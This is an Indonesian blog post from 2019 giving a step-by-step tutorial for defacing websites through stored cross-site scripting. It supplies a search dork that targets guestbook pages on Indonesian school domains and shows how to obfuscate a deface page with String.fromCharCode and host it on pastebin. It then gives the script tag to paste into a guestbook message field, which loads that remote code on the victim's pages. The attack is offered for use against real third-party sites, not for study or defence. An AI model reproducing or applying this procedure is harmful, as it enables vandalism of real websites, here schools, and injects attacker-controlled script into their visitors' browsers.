Saturday, July 6, 2019

Deface dengan PoC JSO - DarkX7


Deface dengan metode JSO



DORK: inurl:/bukutamu.html site:sch.id (bisa dikembangkan lagi)



Kalau sudah menemukan target, maka kita harus mempunyai script deface jso terlebih dahulu.
Caranya adalah dengan menyiapkan script deface masing" (ext.html) lalu pergi ke web http://jdstiles.com/java/cct.html

Copy semua script deface html kalian, lalu paste pada bagian/kolom "Web Design"

Setelah, mempaste tinggal mengklik "CharcodeAt()"

Maka langsung muncul kode/angka pada bagian kolom sebelah kanan. Lalu, kalian copy lagi hasil/charcodenya.

Nah, tinggal disisipkan ke script ini : document.documentElement.innerHTML=String.fromCharCode(pastekan kode disini)

Contoh : document.documentElement.innerHTML=String.fromCharCode(60, 104, 116, 109, 108, 32, 100, 105, 114, 61, 34, 114, 116, 108, 34, 62, 10, 10)

Setelah itu, pergi ke https://pastebin.com/  Buat New Paste, lalu paste kode yg diatas ini kedalam kolom.

Save New Pastenya lalu klik "raw", paste lagi link raw pastebinnya kedalam script ini, Contoh:<script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script>


Selesai, deh ngebuat script JSOnya tinggal ngedeface..



Pertama, Dorking dulu cari yang vuln. Lalu, Register/Daftar untuk mengisi bukutamu.

Isi aja asal-asalan, yg penting paste/masukkan script ini di bagian/kolom "Pesan/Message/Info"
 <script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script> 

Jika vuln, maka tampilan akan langsung berubah..



Contoh Hasil Deface dengan JSO:






Read More ->>

Menu

Social Icons